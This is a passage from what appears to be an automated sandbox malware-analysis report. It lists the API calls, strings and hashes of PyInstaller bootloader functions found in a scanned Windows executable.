                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441A861A1AA8181EA32BB1AA5442BBF394FB96BC4F840135DF4D9778DEEBCD500C714
                                                                                                                                                                                                                                    Function 00007FF7B2B690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetCurrentProcess.KERNEL32 ref: 00007FF7B2B68590
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: OpenProcessToken.ADVAPI32 ref: 00007FF7B2B685A3
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.ADVAPI32 ref: 00007FF7B2B685C8
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetLastError.KERNEL32 ref: 00007FF7B2B685D2
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: GetTokenInformation.ADVAPI32 ref: 00007FF7B2B68612
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7B2B6862E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B68570: CloseHandle.KERNEL32 ref: 00007FF7B2B68646
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B6916C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00007FF7B2B63C55), ref: 00007FF7B2B69175
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                    • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                    • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                    • Instruction ID: a1c2d7425939e692418158c82e1be020349cd66edfe2a0c145be662581a439fe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA218421A0A64241F612BB24E4192FBE260FFA6740FD44036EB4D8779AFFBCD845C760
                                                                                                                                                                                                                                    Function 00007FF7B2B7B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B2D7
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B30D
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B33A
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B34B
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B35C
                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7B2B74F11,?,?,?,?,00007FF7B2B7A48A,?,?,?,?,00007FF7B2B7718F), ref: 00007FF7B2B7B377
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                    • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                    • Instruction ID: e6df2da1ecce8215fbd49e5bd092bce7faf38a5f3bd62840856d7f34346eabbf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23119220A0E60281FA5A772D554013FD1425F667B0F958334DB2E467EEFEACA481C720
                                                                                                                                                                                                                                    Function 00007FF7B2B62910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                    • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                    • Instruction ID: 05bd1e00571816d784bd21264a45c0c88a40c8adfb83ae8ff0d975b697dc0cb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B31F222A1A68152E612B729A8402E7F294BF997D4F800136EF8C8375DFEBCD546C610
                                                                                                                                                                                                                                    Function 00007FF7B2B62390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                    • Opcode ID: d9be6bb75c942322256e5a6e01e0333e112ffd54255a97c93fc713be52e3320e
                                                                                                                                                                                                                                    • Instruction ID: 5ce0be122415a3249d21a9fb5c3ceed90bdfb40d65c488b464d9c97da4788e65
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9be6bb75c942322256e5a6e01e0333e112ffd54255a97c93fc713be52e3320e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2131626261A68184EB25FB29E8551FAA360FF99784F840135EB4D8BB5DEF7CD100C710
                                                                                                                                                                                                                                    Function 00007FF7B2B62B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7B2B6918F,?,00007FF7B2B63C55), ref: 00007FF7B2B62BA0
                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7B2B62C2A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                    • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction ID: 9de56ca47da00e87fc75ee40be25587f8fa86a1a6711229040dbebca20a491f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9121F622709B4141E712AB28F4457ABB360EB99780F800136EF8D9771EFE7CD605C710
                                                                                                                                                                                                                                    Function 00007FF7B2B62710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7B2B61B99), ref: 00007FF7B2B62760
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                    • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction ID: bb278804ec79bb59d0a82ba856561de66fc3e02e2fb07cdb9abc2aeaac0d7e7f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321B132A1A78192E622AB28B8417E7F294FB99384F800135EF8C9365DFFBCD545C750
                                                                                                                                                                                                                                    Function 00007FF7B2B79A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                    • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction ID: 2cf9eec0d28a3b01799bdef94bc928becf872a87f7c4ee6a2edd817592ddd47f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0C821B0BB0681EA11AB2CE449777A320AF67760F940239C77E491FCEFACD044C320
                                                                                                                                                                                                                                    Function 00007FF7B2B89368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1156100317-0
                                                                                                                                                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction ID: 40825c11bb19e86264cf00e77f8fc6a26de56f152e4de1ce227f0087db0b184a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF115422E59E0241FE66315DE49937B9050AF77360E88863CE76E1F3DDAEFC5441C120
                                                                                                                                                                                                                                    Function 00007FF7B2B7B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3AF
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3CE
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B3F6
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B407
                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7B2B7A5A3,?,?,00000000,00007FF7B2B7A83E,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7B418
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                    • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                    • Instruction ID: 9c6c51e611f6a3f426660e9daab87d2896ac6e68b4e1a8cd5b178ddfbfaaa758
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4116020E0A60241FA5AB76D554117BE1415F767B0FD88334EB3E467EEFDACA482CA20
                                                                                                                                                                                                                                    Function 00007FF7B2B7B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                                                    • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                    • Instruction ID: 778f0eb86af786077209efcf2a2ff65232c0431565b55728862296bd923a87c5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C110620A0B20741FA9A766D445117B95424F77330F944734DB7E4A7EEFDACB481CA35
                                                                                                                                                                                                                                    Function 00007FF7B2B75FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: verbose
                                                                                                                                                                                                                                    • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                    • Instruction ID: 0231efa70123edd18c0b60cb1611a801a5fb5267b659450d51a19f3e75dc0637
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89912722A0A64641E762BE2CC45037FB690AB6AB54FC44139DB5D437E9FEBCE445C320
                                                                                                                                                                                                                                    Function 00007FF7B2B7FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                    • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
